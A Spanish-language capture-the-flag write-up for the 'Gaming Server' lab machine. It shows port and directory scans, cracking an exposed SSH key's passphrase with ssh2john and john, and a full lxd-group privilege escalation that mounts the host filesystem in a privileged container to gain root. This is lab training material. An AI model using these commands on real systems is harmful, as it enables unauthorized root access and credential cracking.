Gaming Server

Una maquina Boot2root facil para principiantes.

Reconocimiento

Empezamos con un reconocimiento de puertos usando nmap

$nmap -sCV --min-rate 5000 -p22,80 -Pn 10.10.192.142 -oN targeted
Starting Nmap 7.94 ( https://nmap.org ) at 2023-07-04 11:44 -03
Nmap scan report for 10.10.192.142
Host is up (0.41s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 34:0e:fe:06:12:67:3e:a4:eb:ab:7a:c4:81:6d:fe:a9 (RSA)
|   256 49:61:1e:f4:52:6e:7b:29:98:db:30:2d:16:ed:f4:8b (ECDSA)
|_  256 b8:60:c4:5b:b7:b2:d0:23:a0:c7:56:59:5c:63:1e:c4 (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: House of danak
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 22.40 seconds

Para empezar vamos a ver el codigo fuente de la pagina donde encontramos un comentario de los devs

Con esto se puede deducir que hay un usuario john.

Investigando un poco mas vemos que tiene un directorio /uploads el cual contiene un dict.lst que parece ser un diccionario con contraseñas.

Usando Gobuster vemos otro directorio /secrets el cual tiene una clave RSA

===============================================================
Gobuster v3.5
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.192.142
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirb/small.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.5
[+] Timeout:                 10s
===============================================================
2023/07/04 11:52:08 Starting gobuster in directory enumeration mode
===============================================================
/secret               (Status: 301) [Size: 315] [--> http://10.10.192.142/secret/]
/uploads              (Status: 301) [Size: 316] [--> http://10.10.192.142/uploads/]
Progress: 959 / 960 (99.90%)
===============================================================
2023/07/04 11:52:47 Finished
===============================================================

Copiamos la clave en nuestra maquina y le damos permisos con: chmod 600 id_rsa.

Con esta clave podemos intentar logearnos por ssh con ssh -i id_rsa john@10.10.192.142 pero nos pide la clave.

Teniendo en cuenta que tenemos un diccionario con posibles contraseñas podemos usar ssh2john

ssh2john id_rsa > hash

Y luego usando john y el diccionario podemos crackear la clave que se usaba con la clave RSA

Escalada de Privilegios

Ahora si ya podemos ingresar por ssh y empezar con la escalada de privilegios

Con el comando id podemos ver que formamos parte del grupo lxd e investigando un poco por internet vemos que somos capaces de Escalar privilegios gracias a este grupo.

En nuestra maquina

sudo su
# Instalamos los requerimientos
sudo apt update
sudo apt install -y git golang-go debootstrap rsync gpg squashfs-tools
# Clonamos el repo
git clone https://github.com/lxc/distrobuilder
# Make distrobuilder
cd distrobuilder
make
# Preparamos la creacion de alphine
mkdir -p $HOME/ContainerImages/alpine/
cd $HOME/ContainerImages/alpine/
wget https://raw.githubusercontent.com/lxc/lxc-ci/master/images/alpine.yaml
# Creamos el container
sudo $HOME/go/bin/distrobuilder build-lxd alpine.yaml -o image.release=3.18

Despues, subimos los archivos lxd.tar.xz y rootfs.squashfs a la maquina vulnerable.

Agregamos las imagenes

lxc image import lxd.tar.xz rootfs.squashfs --alias alpine
lxc image list # Podemos ver la nueva iimagen importada

Creamos un container y agregamos el path de root

lxc init alpine privesc -c security.privileged=true
lxc list #Listamos el container

lxc config device add privesc host-root disk source=/ path=/mnt/root recursive=true

Executamos el container:

lxc start privesc
lxc exec privesc /bin/sh
[email protected]:~# cd /mnt/root # Aca es donde esta montado todo el equipo victima

Y listo, ya deberiamos tener privilegios como root.

Si alguna parte de la escalada de privilegios no les funciona, les dejo el respositorio para que puedan investigar ustedes mismos Hacktricks Github.

AnteriorMaquinas Siguienteh4cked

Última actualización hace 2 años

hashtagReconocimiento

hashtagEscalada de Privilegios

Reconocimiento

Escalada de Privilegios